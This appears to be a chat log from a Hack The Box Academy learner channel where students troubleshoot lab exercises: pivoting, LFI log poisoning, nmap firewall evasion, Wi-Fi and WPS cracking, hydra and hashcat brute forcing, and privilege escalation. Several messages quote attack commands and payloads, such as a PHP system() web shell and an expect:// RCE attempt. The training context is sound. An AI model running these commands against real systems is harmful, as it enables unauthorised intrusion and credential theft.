socks5 127.0.0.1 1080)
hi guys, currently doing {Login Brute Forcing} | {Web services}. I've successfully brute forced the creds and it's giving me | sshuser@94.237.60.154: Permission denied (publickey). when trying to login
looks like the wrong ip, that's a public ip. or you're on the wrong port.
yeah but that lab doesn't require an openvpn to connect to the lab
nvm guys i got it lol
I have questions about the student subscription, should I continue buying the modules with cubes or are they included when paying the $8 monthly?
With the student sub you get access to all modules up to tier 2
And modules you complete, are yours to keep
so I don't have to purchase cubes?
No
Learn about the different Academy subscriptions.
I've used Ligolo for pivoting going through other lab setups, but this is the first time I use it for double pivot. It's part of the pivoting and tunneling skills assessment. I have read several walkthroughs on it, and have so far:
- To avoid any mismatch, I re-downloaded the proxy and agents from the same release.
- I added a new ligolo tun interface to get the second pivot connected on that one.
- I've tried different ports for the second pivot through the first (added listener).
But every time I execute the agent on the second pivot (windows) I get the same error on the Ligolo server:
ERRO[1845] dial tcp 127.0.0.1:11601: connect: connection refused
Does anyone recognize this error, has encountered it or understand what it's about? I have googled but cannot understand why it goes wrong.
Thank you for any input!
Honestly it seems like the wifi pentest module is a little buggy here and there 🙂
Not complaining. If you ask me a little buggy is best so it's a bit like real world. 🙂
so I'm trying to get a reverse shell on one of the labs but I'm having an issue that the lab doesn't recognize the openVPN ip address.
the openVPN ip address is 10.10.14.102, I tried to run the following command on the target <?php system ("ping -c 3 10.10.14.102"); ?> just to assure that there is a valid connection. but the returned value is 100% lost..
what am I missing here?
Did you try to restart your VPN for good measure?
yes
What module is this?
there is a different VPN you have to download for the starting point section
O that is just a retired lab
it's not the starting point. my bad
but the lab works when I run the OpenVPN file I already have, I get connection to HTB server, so it must not be a file issue
yes of course
Well if you can ping the lab that means it is not a connection issue. It has something to do with you not doing something correctly. 🙂
I just checked the network interface using ipconfig /all on my windows machine, it returned this regarding openVPN status:
Unknown adapter Local Area Connection 2:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : TAP-Windows Adapter V9 for OpenVPN Connect
Physical Address. . . . . . . . . : 00-FF-81-86-73-21
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
IPv4 Address. . . . . . . . . . . : 10.10.14.102(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . :
NetBIOS over Tcpip. . . . . . . . : Enabled
so I used the correct ip address to ping from the lab to my machine
yeah I know, I just can't figure it out, when I ran <?php system ("ping -c 3 10.10.14.102"); ?> on the lab, it returned that all packets were lost, so it tried to connect, and the command executed correctly.
what may the issue be?
windows doesn't respond to pings often
hold on.
I tested it on a LAN windows machine, I was able to ping to it, what do u mean?
yes if you have firewall enabled it's not going to respond to ping
But what I don't understand is. You are connecting to the VPN on your windows and using a VM for linux or how? You just use windows with WSL to hack?
so if I tried to ping from the other LAN machine to my machine using my eth0 IP address, do u mean it won't respond on the other LAN machine?
well yeah I'm using WSL, but long story short, I'm currently just trying to ping from the Lab machine to the openVPN ip address
because I need to change some configs within WSL to allow bridge connection so I can use it for reverse shells
It depends if you set your firewall for a public or private network i believe
try doing anything else, like putting up a python http server, and see if that works
man you are making life hard for you i can tell you that. Just use a VM 😄
so if I try to ping from other LAN machine to mine, you mean that it won't respond, right?
Try turning the firewall off and see
I said it depends. Firewall has public and private network setting
I want to use a VM, but I'm currently using a laptop, so the monitor size is kind of annoying 😂.. gonna buy a monitor just not soon enough
ok if I set up a python server, what then?
change your payload to get something from it instead of pinging you, and see if that reaches you
ah nice idea, so using curl http://pythonIpAddress.com on the lab machine is enough
Topic LFI
can't read/find any file within /etc /var folder
can bypass ../ with double url encode
can only read error file with php wrapper base64 read resource which I fuzzed
Know it's nginx and know the php version
Any approach how to gain RCE?
Which lab exactly are you on? on the LFI section.
Can you access the access.log file of nginx?
when I was doing that module what was happening was my payload was crashing the access.log of nginx and I had to reset the lab
I tried to access /var/log/nginx/access.log but don't get any result back
did a bunch of ../ before
Its the LFI assessment: https://academy.hackthebox.com/module/23/section/513
You should have access to the access.log file with LFI
but before that
did you find the hidden admin directory?
Guess I have to do log poisoning somehow but can't access the log file...
can anyone help with the last question at the hidden SSID section on the Wi-Fi pen testing module? Can't seem to figure this one out
Identify the name of the hidden SSID with the BSSID d2:a3:32:1b:29:d5 and submit it as your answer.
Whatever way I choose to find the hidden SSID it doesn't work and if it does it gives the name of a previous BSSID
I just did this :D. It works. You have to use the wordlist provided in the /opt directory
I did and it is not the same as first question? "Cybernet-******"
It's not the same. you gotta use sudo mdk3......
Am I doing something wrong? wifi@WiFiIntro:~$ sudo mdk3 wlan0mon p -f /opt/wordlist.txt -t d2:a3:32:1b:29:d5
It doesnt look like it. What is the output of this command?
Nothing
Also there are no packets being sent to d2:a3:32:1b:29:d5 so can't use aireplay-ng either
Anyone can help me out on DACL Skills assessment, 3rd question? I have got the LAPS password for WS01 but not able to rdp into the machine
If you are trying to rdp directly from your VM it won't work. You have to pivot
@final shale found the admin directory and the log file - used the user agent to write something to the log files (system/http/chat.log) but it doesn't get logged if I search for the keyword
Man this host we RDP into on the wifi pentesting module is so slow...
This is the wrong log file. You have to use a different log file. For the log poison.
So I have to do lfi on the second parameter somehow?
No. If you have the admin dir. Now you would be able to access the access.log file of nginx from that directory(the admin one)
"Escalate the privileges using capabilities and read the flag.txt file in the "/root" directory. Submit its contents as the answer."
Is there an easy way to open a file without vim? I tried using nano but it doesn't work on my machine. I am having a really hard time attempting to edit the vim file for the question in this module section:
https://academy.hackthebox.com/module/51/section/1844
I hate vim
nano
Try vi
echo "[text]" > or >> [file]
Also, this works fine when uploading godpotato onto the host & running it directly - I'm only encountering the subsequent "execute" command issues when I create a sacrificial process & inject the donut generated shellcode of godpotato into the process..
Has anyone else run into this while double pivoting with Ligolo?
One option is using cat EOT. If nothing works editing wise on the remote host consider replacing the file?
Hey guys, can someone explain how the nopac module in netexec works? I read the theory of nopac, but I can't get how one can decide if a DC is vulnerable to nopac by comparing the sizes of the TGT without PAC and the TGT with PAC.
guys in the api module the target isn't alive, I tried accessing it deleting the cache, logging out, but nothing works
any help?
hi is the target working for you ?
Hello, I'm doing the Linux enumeration module and in section 'Environment Enumeration' (https://academy.hackthebox.com/module/51/section/1592), I'm getting answer incorrect even though I've found the flag.txt in the root folder. I tried submitting it in different formats but no luck : HTB{xxxxxxxxx}, {xxxxxxxxx}, xxxxxxxxx
Did anyone have an issue like this?
I don't think that's the right flag, at least in my notes it's in a different place.
yes i did the pivoting . not sure why not able to connect
Hello! I'm doing the Nmap basics path, and I'm stuck in the Firewall and IDS/IPS Evasion - Hard Lab.
From the course I saw that there is a way to specify a source IP and a source port using -S and -g. My issue is, if I specify a source IP and target interface, I get the following error:
q@grospc:~$ sudo nmap 10.129.34.50 -n -Pn -p 445 -O -S 10.129.34.200 -e enp4s0
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 14:54 CET
setup_target: failed to determine route to 10.129.34.50
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 0.06 seconds
failed to determine route to 10.129.34.50
Use the same steps as the Evasion section
Yep
but they don't cover how to configure this, they just show that you can specify a source ip and it directly works
You don't need to specify source ip to pass this module
ah, okay, I'll try to not use it then, but I'm still concerned on why it doesn't work on my machine
even on the pwnbox it doesn't work
but you are missing something crucial in the command.
ah
Scan all ports and make scan so it looks like DNS queries. 😉
so you mean I should use the -sU option to make udp scans?
no
-sS is fine
find which port uses dns and make traffic from nmap go through there
but aren't dns servers / dns queries working with udp
mh this is what I get with -sS
m@grospc:~$ sudo nmap 10.129.34.50 -n -Pn --top-ports=10 -sS --disable-arp-ping -g 53
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 15:05 CET
Nmap scan report for 10.129.34.50
Host is up.
PORT STATE SERVICE
21/tcp filtered ftp
22/tcp filtered ssh
23/tcp filtered telnet
25/tcp filtered smtp
80/tcp filtered http
110/tcp filtered pop3
139/tcp filtered netbios-ssn
443/tcp filtered https
445/tcp filtered microsoft-ds
3389/tcp filtered ms-wbt-server
It's a hint, man. You are taking it too literally 🙂
with udp scan it says open|filtered for all ports
oo yeah to be less aggressive
with -T2 it says it will complete in 30 mins 🤔
also without it just says that all ports are filtered
so here did you mean to use -g 53?
Yes. Did you do -p- ?
idk I can't get any port open 🤔
as said if I try too many ports then I get blocked
but in the hint they say this :
Our client also mentioned that they were forced to add a service that plays a vital role for their customer because they require large amounts of data
And the service 139/tcp netbios-ssn has been added which is meant to transmit heavy data traffic
I don't understand how to access this port in order to get more information on the service using nmap
here is the command I executed: sudo nmap 10.129.34.50 -n -Pn --top-ports=10 -g 53 -sS -D RND:5
mmh
Are you doing the enum with nmap module and you are on the hard assessment lab?
you sure you are scanning the right thing? I get only 3 ports open
sudo nmap 10.129.33.221 -sS -Pn -n --disable-arp-ping --reason -v -g 53
what wtf you got the results very fast, why do i have to wait for 5 mins for the nmap to complete
for the hard lab make sure to scan ALL ports tcp and udp, and scan for source ports because -p- udp scans will take forever
and try to connect to that port in a Different way not nmap to get your flag, and be patient wait 30 seconds
I think it maybe because nmap saved my scans.
sudo nmap 10.129.33.221 -sS -p- -Pn -n --disable-arp-ping --reason -v -g 53
this command should work just change the ip
this command will take ~20 mins to complete, is that normal?
and scan for source ports
Wdym scan for source ports 🤔
Not sure what's going on there buddy. It doesn't take that long for me.
🤔
The wifi labs are annoyingly laggy honestly.
Even the clipboard is laggy it needs like 2 seconds to copy anything from the terminal 😄
I just tried to establish a python server on the same OpenVPN ip address which is 10.10.14.102:9999, but I couldn't curl the Python Server on the lab.. it looks like a one way connection
So you have an outgoing connection from attacker to lab but not the reverse?
I still think it's the firewall. Did you try disabling it temporarily?
yes, mine is managed by avast, so i just turned off avast protection
exactly
You sure the windows one is also not on?
Dude something on your end (Attacker) is blocking incoming connections
it's a stupid firewall or AV
or something to do with WSL and that whole botched deal
created by Microsoft 😄
you were right, turning off avast triggers windows defender by default to go on, I just turned off the public, private, domain networks protections manually and the lab pinged to me
but it stumps me, I never touched the firewall and inserted rules related to openVPN, why did this happen? and how do I trace which rule is preventing incoming connections??
Bro no offence but didn't I tell you about the firewall 3 hours ago 😄
I thought avast manages firewall connections, it is what the control panel says 😭
but thank you, I must've doubted that turning off avast is enough to completely shut off the firewall 🙂
You dont even need Avast dude. Use just defender.
but how do I trace which rule is preventing openVPN connections to me? or do I need to create an inbound rule or what to do?
got no experience with firewalls yet 🙂
I have the exact same problem. I even tried using nmtui but the connection I setup with the answers from question 1 and 2 doesn't even show up in the Activate list. I tried connecting to the non-hidden one and ran into similar troubles. It wouldn't be so frustrating if the machine wasn't so crazy slooooooow.
You need to perform a technique to connect to the non-hidden one
Well you can make an inbound rule to exclude the openVPN I guess
The module was well constructed as to perform the techniques taught throughout in a sequence
I will make one right now
I just created an inbound rule pointing to openVPNConnection.exe and allowed all 3 types of network activities (public, private, domain), but it didn't fix the issue; if I restore the firewall protection the lab can't ping me.
huh?
I'd redo the whole module if the machine wasn't so effin slow. I've tried to do so but I have to wait 5 minutes for every click to register so it's not really feasible. Oh well, I expected to get mysterious and undecipherable answers here. Will continue searching elsewhere. 5 days wasted on this machine that takes 5 minutes just to draw the desktop.
That module isn't supposed to be hard.
If you are trying too hard, something must be wrong.
If you are experiencing issues related to lag or latency, you can always try using the Pwnbox
Also, by what HTB Staff have stated, there may be 2 paths to completing.
I've completed it without any effort because one of them was just too straight up after scanning for Wireless devices for the first flag.
I know! I breezed through the rest of the module and am stuck on the last and easiest question. So annoying. Pwnbox was pretty much equally slow. I've been stalking the VPNs for 3 days, waiting for "Low and recommended", 😄
Perform a brute-force attack on the WiFi network named HackTheBox_Secure. What is the WPS PIN?
this is for the Attacking Wi-Fi Protected Setup (WPS) - Secured Access Points
Are you guys sure this is even possible? tried -L -N, it doesn't seem to be working
You can DM me if you feel the answer was too riddled. 😂
Just don't wanna give any spoilers
Yea I know. And it's not a dig against you. From reading through these forums, it seems the concern for spoilers is consistently so great as to needlessly diminish the helpfulness of the answers. 😉
I feel you. There are some useless messages on higher tier module.
Forum might be of better help in this case
No kidding! I'm typing commands, walking away for lunch, coming back and watching it still catching up with the typing! 😅
has pwnbox been lagging for anyone else today?
Well its not that laggy but i would say about a second per click 😄
no other suggestions? 
Hi,
Module: Attacking Common Applications
Section: Skills Assessment II
Section Link: https://academy.hackthebox.com/module/113/section/1108
I have managed to get reverse shell as www-data user. I still cannot get the flag though. When I run a find , no results are returned:
Another nice little WiFi module!
In this module, we delve into the intricacies of WPS, uncovering the common vulnerabilities that plague this technology. From brute-force attacks to more sophisticated exploitation techniques, we will explore how attackers compromise WPS-enabled networks. By understanding these vulnerabilities and their related attacks, you will gain the knowled...
I figured it out, I had to mark the openVPN network as trusted by the firewall, but can someone explain to me why only this solution allowed connections even though I inserted a firewall rule to allow all connections previously?
Hi guys I am trying the windows fundamentals module, submodule: NTFS vs. Share Permissions and I'm trying to connect as a client to the windows server. But when I do I don't get the shares as a result. I get the error: do_connect: Connection to 10.129.46.255 failed (Error NT_STATUS_IO_TIMEOUT). What is exactly the error here? I realize that both my linux system and the windows system I RDP'ed into are seemingly not in the same subnet and thus I think I can't connect to each other? But if I do put them in the same subnet I will lose connection right?
Thanks for the help!
Intro to Whitebox Pentesting module, I'm doing the patching exercise. I've literally patched the code, and I don't see how code injection is possible, since I removed the dynamic function creation, and the only thing the user input is used for is in a console.log and Math.floor call, where code injection is not possible, afaik. How the hell is this patch endpoint thing finding injection still? Can someone enlighten me?
Module: Windows Privilege Escalation
Section: Windows Server
Link to section: https://academy.hackthebox.com/module/67/section/912
Could someone please explain to me why we need to migrate to a 64-bit process? It just states the exploit will not work in section, but why?
It does touch on it saying that if you used a 64bit payload that step would not be necessary. Also if you click on the blue link for searching for privilege escalation, there's a message in there saying that it requires a 64bit process.
I just visited the link as per your suggestion. It supports x86 architecture too, though?
print_error("Running against via WOW64 is not supported, try using an x64 meterpreter...")
Noted. Thanks!
maybe you don't have the privileges to find the flag.txt, so try to see if u can privesc or change user. also maybe it's not named flag.txt
maybe it's named like Flag.txt
solved by moving sanitization outside of calling the password generation function, instead of at the start of the function... I think this module should be reviewed. It's generally best to validate input INSIDE the function, because then the caller is not responsible for sanitizing their own input. Also, it doesn't matter where the sanitization is in this case, so not sure why the tool flags the sanitization inside the function
You're searching in /var/www could it be elsewhere?
you don't have the permissions required to access that dir
Greetings I have created account with my academic email and for some reason it doesn’t allow me to choose the student discount plan
Is there someone who can help me with this issue ?
Reach out to support
Need to speak to a person? Learn how to reach our support via HTB Labs.
Thanks!
What module and section?
You need to read the section again, it spells out how to do it.
I did priv escalation. It was nice!
I was actually in the root directory for nagios. I searched a little here and there. But find could not locate it. Anyways, I did priv esc. So, got the flag!
ARE YOU SERIOUS ?
😂
lol
Twice
sigh...
damn the skill assessment was challenging
Can someone give me a nudge for this section to be able to read the flag:
Attacking Common Applications - Skills Assessment I?
I have tried everything to read the content of flag.txt,
but nothing works except for the dir command.
I also attempted to use type, more, and less,
but they didn’t work either.
I tried using PowerShell instead:
Get-Content flag.txt
But nothing worked.
I have tried both exploits in Searchsploit, but the only thing that worked was Gobuster, which helped me find this file path.
what happens if you do it in your browser instead of burp, it looks like your GET request is off but I could be wrong
It gives no response; it's blank
alright, well your Burp looks wrong, I think it should be a different color than the "GET" part but I could be wrong
No. Burp works well too but the problem is the command, only dir works
maybe encode it all?
If you got RCE via web shell and you are getting problems reading files, why not move to a reverse shell!?
Skill issue:
I couldn't find the module in metasploit.
And the skill issue is that I wasn't able to set up manually the requirements needed for the exploit.
So I am using the RCE via web shell because it was way easier.
What happened? lol the target machine is different now
you had a different port in your previous screen shot
Is there any way I can make the module "the live engagement" under shells and payloads faster
?
make it faster how
Idk it takes 20 seconds to see the output of ls in terminal
Thanks, @acoustic owl ! You're life saver! Got my sanity back!
Not much really to my knowledge, not sure why that happens but yeah it happened to me a lot too.
Whoever came up with the idea for making a cheatsheet at the end of every module deserves a raise.
You can download them as PDF and save them in Obsidian
I can't ping machines from my local machine, but can when I'm in pwnbox. I'm in "getting started - privilege escalation." I'm connected to the VPN, any idea?
Do a sudo killall openvpn; sudo openvpn ~/Downloads/academy-regular.ovpn
*and make sure you don't have a Pwnbox running at the same time as trying to VPN in from your local machine
Congrats 🤘
Sick module!
if i cancel my HTB Academy subscription, will i only retain access to a module if i have 100% completed it, or is simply enrolling in it enough?
You'll only retain access if you complete the module 100% IIRC
thank you for clarifying
I ran sudo killall openvpn, and made sure I don't have any Pwnbox running, still can't ping boxes. I logged out of HTB, restarted my VM, logged back in, connected to VPN, and still can only ping from within Pwnbox.
have you recently switched vpn regions?
Do you get any errors from the openvpn command on your local VM?
I don't see any errors
Is it normal to get the same IP in Pwnbox, as the VPN gives you locally?
Haven't switched regions
ok. do killall -9 openvpn, in your browser press CTRL+SHIFT+R, then terminate the target, then shut down your VM entirely. reboot your host PC. after that launch your VM, connect to the VPN, click spawn target, and wait 5 mins for it to fully spawn, then try again.
Well, you're connected to the VPN from somewhere, and that client is reachable
do all academy targets respond to pings?
I.. would have thought so
i guess he said he could ping from the pwnbox
This one does if I'm in Pwnbox
Curious if your VM has internet access. Don't want to overstep someone else troubleshooting but if not, do a 'sudo systemctl restart NetworkManager && sudo systemctl status NetworkManager && ping 1.1.1.1'
I can help diagnose in DM if you want @terse sedge - I do see a connection currently
Otherwise I'd say change server and try again. If that does not help, raise a ticket with the support team.
I can't ping 1.1.1.1
Routing overlap of your local network and the HTB network possibly? :\
What do you get from ip route list ?
Again, you can share in DM if you want, instead of here.
sure
The IP you mentioned for the target.. it's not active any more btw
Perhaps you need to start it again?
Should see it now
I do, and I can ping it. Sent a DM with a few questions
That kind of interactive portion does not require VPN access, btw.. but if you can't ping it from VM then there's obviously something wrong
Ask for advice, not for the answer.
I asked for the advice because I want to learn and improve
I got it but I don't fully understand why
Why is John not able to crack the password? This is in passwords attack lab medium
also, if you have a monthly subscription that gives you cubes, then any module you unlock with cubes will be yours forever
There is some catch with it; I did it with a different command than john
Try this @crimson moon hashcat -m 17200 timelapse.hash /usr/share/wordlists/rockyou.txt
For some reason john doesn't recognize the format automatically that's my assumption
Throws the error of “no hash loaded”
Is Timelapse.hash the output after you do zip2john?
Yes that's correct
how to fix kerberos time skew?
Instead of mode 17200 for hashcat try 17210 or 17220
You have hashcat examples where you can look up the hashes to identify them
As I recall I think I solved it like that
@crimson moon let me know of the results
how do i feed impacket the server time?
tried faketime/ntpdate $IP but no avail
Same result it says “Signature unmatched” have tried different modes referring to hashcat examples but to no avail.
Send me a DM let me try it @crimson moon
Anyone else having issues with the RDP question in the Password Attacks module, Network Services section?
I know what the user is, I get a hit with hydra if I pass in the exact user and password. However, if I pass in the exact user and a password list, I will not get a hit even with an extremely slow brute force command
hydra -L ./user.txt -P ./Desktop/Shared/HTB\ Academy/Password-Attacks/password.list rdp://10.129.239.175 -t 2 -W 4
It seems like the only way to get a hit on the RDP service is to pass in the exact values, and some users on the forums have mentioned having issues with the RDP service in the past as well
try brute forcing a different service
im trying to do the enumerating users section of the broken authentication module and when I try to run the ffuf command it says command not found
sudo apt install ffuf
thank you
impacket tool to add user to a group?
Attacking Common Applications - Attacking Thick Client Applications
Can anyone give me a pointer to what I need to do here? I've read on the forums the importance of finding the red arrow, but in the module I see a red arrow going down one line; the smallest red arrow I found is going down two rows, and when I follow those in Memory Map they do not have a row "User - Map - RW"
scroll down the memory map tab?
Did you set the breakpoint properly?
I have to right click a CPU entry first to get to the memory map, and whenever I click and check the memory map I filter by User and none of them have R-W and/or Map
Pretty sure I did then I restarted the program, is it meant to break at the entry we right click on and take it to memory map? If so that would be the last entry in the CPU tab right?
Follow the section
The section explicitly tells you what to do, and what breakpoint to set
in the getting started module for privilege escalation i cannot understand how to obtain the flag for the second question.
https://academy.hackthebox.com/module/77/section/844
i cant run any scripts. none of the commands or walkthroughs seem to even remotely steer me in the correct direction, and i think its due to just slapping two huge repositories for enumeration in front of people and saying "figure out which one works" bc as simple as the answer probably is, I cant figure out how to get root. i got to user 2. the hint says "dont forget to chmod" ive been on this for a week.
have you tried looking at hidden folders in root's directory with the 2nd user?
you know, i had the thought, but didnt really know how to execute so i didnt investigate. i'll look into that!
yep, whenever you gain access to another user you want to see what kind of permissions that user has that you may not have had access to before. looks like user2 can read something in there.
on the task at the end of file inclusions - php wrappers i was able to get RCE from both the data wrapper and the input wrapper. But I cannot for the life of me figure out how to do the same with the expect wrapper, despite it being installed. my payload is ||curl -s "http://94.237.63.109:37671/index.php?language=expect://id"|| but it just returns the normal page. any hints would be much appreciated.
I am stuck on :
Shells & Payloads
The Live Engagement.
Host # 1
Issue: i have run the payload many times and waited even 30 mins to receive the reverse shell connection, but no results.
your lhost looks off
may want to delete the pics though not really it's needed here, kinda gives part of it away
so what to do now?
your lhost is your listening host, do you have a nic that has 172.x.x.x?? your vpn is probably 10.x.x.x
yeah the rdp in which i am connected has the ip of 10. but as the target exists in the inner network, the inner address is 172.
well metasploit can't listen on an ip you don't have on the same box that metasploit is running off of
i also have tried nc
You can pivot through an msf implant though right? IIRC there were a load of features for setting up routes through msf payloads
..but perhaps not included in that module
i know metasploit has an autoroute feature but i haven't really used it, and yeah i don't think it's included in that module
here it is
any solution for mine one?
what's the IP of your VPN connection
I only used it like once, in the pivoting module i think.. so yeah i'm not that familiar with it. i generally avoid metasploit if i can.
i am using pwnbox
it is payload & shell module
alright well either way it sounds like you don't have the correct lhost, just verify all your settings
That's > Tier 0, so please take advice to DM 🙂
or at least can anyone confirm that it is possible/impossible so i know i am not going insane
Guys I am new on HTB, how am I supposed to prepare for mobile challenges? there are no modules in academy
It's possible that module is disabled
is the module being disabled independent of whether "extension=expect" is in the php.ini file?
I completed the pivoting skills assessment with other tools, but still curious why I couldn’t make Ligolo work for a double pivot. I kind of hoped for some interest in the subject but obviously not
copy : Cannot find path '\\192.168.1.19\MYSHARE\supersecretpass.txt' because it does not exist.
At line:1 char:1
+ copy \\192.168.1.19\MYSHARE\supersecretpass.txt
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (\\192.168.1.19\...rsecretpass.txt:String) [Copy-Item], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.CopyItemCommand
i am getting this error while transferring files with smbserver
verify the IP address
i can ping the ip and ip is correct
i am running a vm on my local network
no i am locally doing it
i can ping the ip and i set the vm to bridge adaptor bcz nat has some issue, i dont know.
the request is coming to the smb server with an ntlm hash
but closing down the connection
hash is coming from HTB victim box?
.
ah not sure then sorry
What module/section?
module file transfers, windows file transfer section, in #smb downloads
That module doesn't have you do it locally. Host the SMB server from the VPN connection.
no i am locally doing that
i found many people are facing the same problem
smbserver works fine, you're doing weird stuff locally with nat
that's not part of the module to locally transfer between your host and vm
it works
with creds
i am using bridge adaptor . yeah i know things will get complicated in nat . it doesnt matter if the connection is local or remote . smb will work fine
its the problem of smbserver i have the latest one from github maybe u downloaded it with repo
probably the version of smb you're using, i think smbv2 requires creds
but your error indicated the path didn't exist/couldn't connect so idk.
the connection is coming to the server
then connection refused
i am getting ntlm hash so there is auth but there is no auth on my share so we have to set auth on smb share too
I am so curious as to how HTB made the wifi labs. 🙂
Everyone asleep? You have to be more dedicated guys 😄
this was the question i was given: Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com/" website and filter all unique paths of that domain. Submit the number of these paths as the answer.
this is what i put in for the command: curl -s https://www.inlanefreight.com/ | grep -oP 'href="https://www.inlanefreight.com[^"]*"' | sed 's|https://www.inlanefreight.com||' | sort -u | wc -l
but i still got the question wrong, why?
i was able to solve it using AI, but non urgently if someone could describe to me what this all means that would be awesome
I've finished writing the report for the Documentation and Reporting Skill Assessment. Would anyone with experience like to take a look and give me feedback?
I don't have much experience, but i can give you a second opinion if you like.
Is Introduction to Deserialization Attacks PHP lab only very unstable for me? Seems like it takes minutes to load the pages every time, also times out from time to time. Restarting the target didn't help
Can anyone help me with the Skill Assessment on Wifi pentesting basics? What is the password for the WiFi network with the BSSID D8:D6:3D:EB:29:D5? Can't seem to find out the pass. I managed to find the answer for the first question
can you specify the module/section you are referring to? not sure if I can help, but I'll take a look
Check the module again. There you will be shown step by step how to get the password. You have already done the same a few sections before.
Anyone having issues with metasploit and Parrot 6.2? across several modules I get the same error “can not load stdapi” and “load stdapi” does not work. But my parrot 6.1 vm and the Pwnbox work
Module: Windows Privilege Escalation
Section: Windows Privilege Escalation Skills Assessment - Part I
Link to section: https://academy.hackthebox.com/module/67/section/637
I managed to obtain a reverse shell and have tried most manual enumeration stuff and even used a few tools shown in the module, and even checked metasploit. I've prolly missed something. Could someone please give me a nudge?
Edit: I managed to get the flag, however, I have a couple questions. I can't ask the questions here without revealing info, so please DM me if you'll be fine answering my questions. I managed to privilege escalate, but haven't got the answer to question 2. If someone could also nudge me on question 2, I'd greatly appreciate it.
linux fundamentals filter contents 😁
I have a quick answer
dm. I'm doing the same thing and managed to get flag 2
Wrong channel to ask in, read and follow #welcome to access #hardware-iot-ics
In Active Directory Enum & Attacks > Bleeding Edge Vulnerabilities with something like NoPAC, Print Nightmare or PetitPotam, and probably loads more... what's the efficient way of identifying the likelihood that these exploits are worth a shot. The reading material covers just 3, but assuming there are a dozen more and variants of each, running individual checkers or just trying them seems like the wrong strategy.
or maybe I'm thinking about this wrong.
winPEAS ||if you are lazy||
Thanks, I was hoping this would be covered more going forward... like in Windows Priv Esc. ||and who isn't lazy when it comes to tedious checklists that can be automated?||
I mean... For AD you can always use Bloodhound or Adalanche
They will show you a straighter path to Domain Compromise
But I like detailed output, so I always go for PowerView first
Anyone who completed "Active Directory Trust Attacks module"?? If yes can you reply to this message I will DM you with my doubts!
Hey guys! This is the only channel I found in which I could write something. I am a Software Engineer and I would like to change my career path into cyber security. I hold technical knowledge in software and IT but maybe I do not hold so much knowledge in cyber security. Is it okay if I go and directly start one of the intermediate career paths, or should I start with the Information Security Foundations? Do they give some introductions into the different job paths in the Information Security Foundations path? Thank you in advance
Hi, I think you should ask your career related questions on #careers-and-certs
I do not have access to that link 😦
Read #welcome
Hello,
I just finished the Medium - Skills Assessment for the Password Attacks module, however I'm not sure that I really understood the last part (it was a hint on the HTB forum that made me try what I did).
So I managed to connect "d" user. But from there I couldn't find any hint to get root password. And the hint said that we must reuse the stuff we found, and from there I used stuff on the dennis home directory and managed to be root.
But for me it's like a really big guess or maybe I've missed an important piece of information that points me in the right direction ?
I believe that's the one with the pw protected file yeah?
Just logical leaps
Always test for reuse, basically
Hey ! Could someone help me ?
I finished the whole sqlmap essentials module except one question, case 11 of bypassing Web application protection. i would assume that my tampers are great but still "unable to retrieve column" / "unable to enumerate colomn" for the tables. Could someone help me on this pls ?
It is an encrypted rsa private key in the folder of the "d" user but which can be used to connect as root. I understand that we must always try to reuse what we found but isn't too much here ? I thought there was an information somewhere on the asset that would indicate that we must use the rsa key for root account.
What ur command (dm me)
The case page mentioned Filtering of characters '<', '>' so you should try tamper scripts relating to this filter.
i would assume im using the good ones, so i dont want to tell them here in case
you can dm me too
Logical leap, why is it protected
if an account is ASREPRoastable, can't we just use the TGT from that account and keep passing it? is the actual password useful in anyway?
"custom wordlists" on brute force
am i supposed to input the examples info into CUPP and anarchy?
or is it another thing that i need to OSINT
iirc use the ones in the module
gotcha, ty
hello
how can i get help for pro labs
Please read #welcome and #rules it will explain how to get verified then you can access #1263635449335910531
does not yield me any results
I have a problem can i send your dr screenshot
Sure
yo @storm elk could you help me out?
It should be explained in the modules/sections
I’m not at my pc
oh ok
its just that it does not tell you to use any info
and even when i did the module it hasnt actually gone through
No info found on the site?
nope
You just need to follow along with section text, it's clearly explained there and should be working
yeah i did...
maybe i mistyped i guess, but the wordlist i did is the same as in the text
does it take a lot when you did it?
or did it go through almost instantly
iirc it worked instantly
must've made a typo or something. Try doing the steps again
Pivoting, Tunneling, and Port Forwarding skill assessment Q # 4: Use the information you gathered to pivot to the discovered host. Submit the contents of C:\Flag.txt as the answer. I already ssh into m* creds, found the 172 ip with the ping sweep. I am having issues using proxychains xfreerdp. tried metasploit too, but nothing doing. Any hints would be appreciated.
ure not supposed to do the grep thing; if u dont do it, it does work instantly
idk why they put that there
I did the grep thing and it worked for me
have you tried sshuttle? It worked perfectly for me
anyone down to help me w/ a web enum module on the cpts path?
Specify the module and section, what you’ve tried and what you’re stuck on
Information Gathering - Web Edition
Final skill assessment
q3
What is the API key in the hidden admin directory that you have discovered on the target system?
did you scp sshuttle to the web* host? I wasn't able to transfer anything to it either. maybe just syntax issues.
idfk what to insert into etc/hosts, and what to put in ffuf/gobuster, w/ port, w/out port, it finds NOTHING, used like 8 wordlists, consulted w/ a friend who finished the module and got the answer, we literally PUT THE DAMN ANSWER in an empty wordlist, tried again and nothing...
Can anyone help me with the Conditional Branching exercise in the Intro To Assembly Language module?
I don't think I really understand the question tbh. The question is "The attached assembly code loops forever. Try to modify (mov rax, 5) to make it not loop. What hex value prevents the loop?"
Surely the answer to this is 0 or 0x0 but these are not the right answer.
you don't need to transfer sshuttle to the remote host, you can just set it up locally exposing the 172 network
anyhow if anyone can help me w/ this crap i'd be in their debt forever and will chase your enemies w/ ancient blood rituals from beyond the abyss, please hmu on dms
subdomain brute forcing was the key to find this one
ok. I will look into this. appreciate it.
my brother in christ i have bruteforced this godforsaken subdomain for 2 hours
I defo fucked something up on the /etc/hosts
Sorry ignore my previous post. It's actually really obvious.
It was assembly code I didn't understand rather than the question.
show me your commands in dm I'll try to point you in right direction
